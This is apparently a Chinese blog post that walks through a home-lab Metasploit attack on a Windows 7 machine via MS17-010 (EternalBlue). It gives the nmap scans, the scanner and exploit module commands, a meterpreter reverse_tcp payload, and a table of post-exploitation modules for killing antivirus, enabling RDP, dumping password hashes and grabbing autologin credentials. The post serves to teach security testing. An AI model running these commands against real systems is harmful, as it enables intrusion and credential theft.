利用 MS17-010 对 MSF 模块学习

已于 2022-09-01 19:32:08 修改
阅读量635 收藏
点赞数
分类专栏: 网络安全 文章标签: 学习 安全
于 2022-08-30 19:21:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/I_like_ctrl/article/details/126610764
版权

我之前写了一篇利用 MSF 里的永恒之蓝模块进行攻击初代 Windows10 还有木马制造.

现在看来只是写了简单的 exploit 使用,并没有开拓 msf 其他模块强大的地方.

Auxiliary 是什么?

Payload 、Post 又是什么?

这几者之间又有什么关联?

我当时在自学 msf 的时候,往往注重结果,而没注重过程.

我也许该重新了解一下这个 MSF 了,就用之前写的 MS17-010 重新盘一遍进行理解

准备工作:

攻击机: Kali Linux (IP:192.168.31.201,宿主机IP:192.168.31.30)

肉鸡: Windows 7 pro (IP:192.168.31.204,宿主机IP:192.168.31.30)

1. 肉机扫描

在这里就要用到 Auxiliary 模块

这个模块是辅助模块,可以用来扫描,破解,嗅探,漏洞挖掘等,在这里我将使用 Auxiliary 模块进行 ms17-010 扫描.

在开始之前,我们先用 nmap 扫描一下局域网内能连通那些机器(假装不知道IP)

nmap -sS -T4 192.168.31.0/24

叨叨念

其实可以试着用 nmap 里面的 vuln 脚本试一下

nmap --script=vuln 192.168.31.204

找到了肉鸡,发现开放了 445 端口

然后我们找到了肉鸡的 IP , 接下来进入 msf 进行搜索 msf17-010 可以用那些模块

search ms17-010

然后利用 Auxiliary 模块进行检测

use auxiliary/scanner/smb/smb_ms17_010

显示要修改的东西

show options

改为肉鸡 IP

set RHOSTS 192.168.31.204

接下来运行

run

可以发现是可以攻击的

2. Exploits 渗透

Exploits 里面主要是包含了各种漏洞利用的脚本,exp的文件路径方式也是否好理解 是exploit/系统/服务/服务漏洞模块 就拿 ms17-010 来看

exploit/windows/smb/ms17_010_eternalblue

一个个对应上去不是非常好理解呢?

这时候我们要使用这个模块

use exploit/windows/smb/ms17_010_eternalblue

3. Payload 攻击载荷

这和 Exploits 有何区别呢?

可以这么理解:在一个攻城战里, Exploit 是攻头兵,负责攻入工作,而 Payload 是善后兵,负责在攻入后,进行接下来的操作.

其命名规则为:系统/类型/名称,比如 windows/x64/meterpreter/reverse_tcp

所以我们要设定 payload

set payload windows/x64/meterpreter/reverse_tcp

然后直接 run 执行即可

run

好了,我们成功渗入

你认为我就这么结束了吗?

别忘了我还有个 Post 模块还没有讲

4. Post 后渗入模块

一般是在建立连接后,采取一些功能性的指令,比方说:提权,获取信息等

比方说虚拟机检测

run post/windows/gather/checkvm

也可以直接运行 shell

shell

常用的 Post 模块

Post 模块指令作用
run post/windows/manage/migrate自动进程迁移
run post/windows/gather/checkvm查看目标主机是否运行在虚拟机上
run post/windows/manage/killav关闭杀毒软件
run post/windows/manage/enable_rdp开启远程桌面服务
run post/windows/manage/autoroute查看路由信息
run post/windows/gather/enum_logged_on_users列举当前登录的用户
run post/windows/gather/enum_applications列举应用程序
run post/windows/gather/credentials/windows_autologin抓取自动登录的用户名和密码
run post/windows/gather/smart_hashdumpdump出所有用户的hash

除了 Post 模块也可以用更多的功能,有的 Linux 指令也可以用的上,比方说:

  1. cd
  2. pwd
  3. cat
  4. ls

也可以使用上传文件 upload 指令,也可以是下载 download 指令.

当 payload 成功渗入后,可以用的玩法确实非常的多.可以使用搜索引擎去找更多.

写后记

在一开始中,我选择的是 Windows 10初代系统,正如我之前写的MS17_010实践要低权限的用户名和密码,同时还得开放一个文件夹.

然后选择了 Windows 8.1 , 和 Windows 10 也是一样的.

最后选择了 Windows 7 ,则不需要低权限用户名和密码.

不知道是什么情况,搜原因无果.抽空再了解了解.

真不想起名TAT
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件
简介
04-30 2707
我昨天我测试了,没成功所以SSH爆破先不写了,我已经把永恒之蓝漏洞玩明白了,这回是采用实战的方式进行入侵。提示:以下是本篇文章正文内容,下面案例可供参考本文就是讲解远程控制并执行文件。
msf复现永恒之蓝漏洞ms17-010(详解)
m0_72125469的博客
05-18 1408
背景:永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
msf常用模块功能整理
m0_55306747的博客
07-21 5878
整理一下msf的常用模块和功能
msf渗透测试学习-与永恒之蓝漏洞案例
weixin_49349476的博客
06-08 4560
MSF是Metasploit Framework的缩写,是一款广泛使用的渗透测试工具,具有强大的攻击功能。它提供了一个模块化的平台,通过将各种攻击载荷、漏洞利用和辅助工具组装在一起,可用于模拟各种攻击,测试系统安全性,也可以用于执行红队实战训练、漏洞挖掘等工作。
Kali MSF命令模块最详细模块利用解释整合
Sunspot
04-19 1699
稍后,如果另一个请求到达该 ISAPI 模块,则将使用先前获得的指针,从而导致访问冲突或潜在的任意代码执行。该模块发送格式错误的 TKEY 查询,该查询利用在受影响的 BIND9“命名”DNS 服务器上处理 TKEY 查询时的错误。由于BigIP会在第一个未经身份验证的请求后分配一个新会话,并且仅当访问策略超时时才删除该会话,因此攻击者可以通过重复发送初始HTTP请求并使会话处于挂起状态来耗尽所有可用的会话。POST 请求处理中的边界错误而存在的,其中应用程序输入设置为过长的文件名。
msf5 自动攻击模块 db_autopwn
07-10
`db_autopwn`是Metasploit Framework(msf5)中的一个核心功能模块,它允许渗透测试者进行自动化漏洞利用,大大提高了效率。这个模块安全审计和渗透测试过程中扮演着重要角色,因为它能够快速扫描并尝试攻击目标...
E024-渗透测试常用工具-使用Armitage的MSF进行自动化集成渗透测试.pdf
12-02
在这种情况下,可以手动搜索特定的漏洞模块,如exploit -> windows -> smb -> ms17_010_eternalblue,这是著名的“永恒之蓝”漏洞。 配置并启动这个漏洞利用模块后,Armitage会尝试对目标Windows 7系统进行攻击。...
Aggressor:Ladon for Cobalt Strike、大型网络渗透扫描器、漏洞利用检测 MS17010 passwordbrute-forcepsexecatexecsshexecwebshel​​lsmbexecnetcatosscannetscanstruts2PocweblogicExp
05-31
外部模块18个,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、SMBGhost、...
一些模块metasploit
08-08
6. **MS14-012.rb**:这个模块是2014年微软公告MS14-012的利用,涉及Windows操作系统中的一个远程代码执行漏洞,攻击者可以通过发送特制的SMB请求来利用。 7. **MS14-017.rb**:对应2014年微软公告MS14-017,这是一...
E115-经典赛题-漏洞扫描与利用.pdf
12-02
在漏洞扫描和分析的基础上,使用了MS08067漏洞攻击模块来对目标服务器进行攻击。在本题目中,使用了use exploit/windows/smb/ms08_067命令来调用漏洞利用模块。 六、漏洞利用选项设置 在使用漏洞利用模块时,需要...
msf介绍及其常用模块
bwt_D的博客
03-01 5786
技术功能模块 exploits:利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法 payload:成功exploit之后,真正在目标系统执行的代码或指令 auxiliary:执行信息收集、枚举、指纹探测、扫描等功能的辅助模块 encoders:对payload进行加密,躲避av检查的模块 nops:提高payload稳定性及维持大小 generate常用选项解释: -b 去掉坏字符,例如:-b ‘\x00\xff’ -e 设置编码方式,可以使用show encoders命令查看所有编码方式 -
msf利用ms17_010经典漏洞攻击--使用msfvonom生成后门msf进行监听
weixin_53884648的博客
10-11 5086
利用msfconsole进行永恒之蓝漏洞攻击,并且使用msfvonom进行Windows木马生成,之后通过msf把木马上传到目标机器,使用msf监听模块进行后渗透权限维持。
Metasploit Framework(MSF)基础框架
weixin_51151498的博客
02-12 3329
MSF使用
msfms17-010永恒之蓝漏洞
AI_SumSky的博客
06-27 6891
**** 1.熟悉msf的基本用法。 2.熟悉一些渗透中会用到基本的windows命令。 3.复现永恒之蓝漏洞。通过向Windows服务器的SMBv1服务发送精心构造的命令造成溢出,最终导致任意命令的执行。在Windows操作系统中,SMB服务默认是开启的,监听端口默认为445,因此该漏洞造成的影响极大。**** 1.打开MSF默认已经集成了MS17-010漏洞的测试模块 利用search语法查找ms17-010 2.探测主机是否存在漏洞,利用use命令选择第三个测试接口,可探查主机是否存在永恒之蓝漏洞
MSF框架-技术功能模块
分享学习网络的点点滴滴
12-20 388
■ 三种Payload:/usr/share/metasploit-framework/modules/payloads/○ Auxiliary:执行信息收集、枚举、指纹探测、扫描等功能的辅助模块(没有payload的exploit模块)○ Exploits:利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动、被动)■ Shellcode是payload的一种,由于其建立正向/反向shell而得名。■ Stages:利用stager建立的连接下载的后续payload。
MS17-010“永恒之蓝”漏洞复现与分析
m0_74887243的博客
01-15 483
MS17-010“永恒之蓝”漏洞复现
MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位
热门推荐
linxaiomo
02-20 1万+
漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口) 2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:192.168.1.9 攻击机:kali linux (X64) ip:192.168.1.101 使用工具:meatsploit,nmap 前期准备工作:由于kali是64位,如果windows 7 是32 位,所以我们得安装wine3...
msf辅助模块详细操作
m0_61506558的博客
09-03 1144
我们知道msf辅助模块有上千个,主要用于信息搜集阶段,功能包括扫描、口令猜解、敏感信息嗅探、FUZZ测试发掘漏洞、实施网络协议欺骗等一、怎么查询 Auxiliary辅助模块我们可以通过以下命令查询所有 Auxiliary辅助模块或二、 Auxiliary辅助模块分类。
渗透测试神器-msf基础
qq_51796436的博客
12-01 5141
渗透测试在远控,权限维持阶段不可避免的要用到msf,在awd中也会经常用到,msf的功能不可谓不强大
ms17-010漏洞复现
最新发布
10-22
ms17-010漏洞是指微软Windows操作系统中的一个漏洞,黑客可以利用该漏洞远程执行代码,控制受感染的计算机。下面是ms17-010漏洞的复现过程: 1. 使用nmap进行探测,发现开启445端口,该端口可能会存在MS17-010漏洞。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值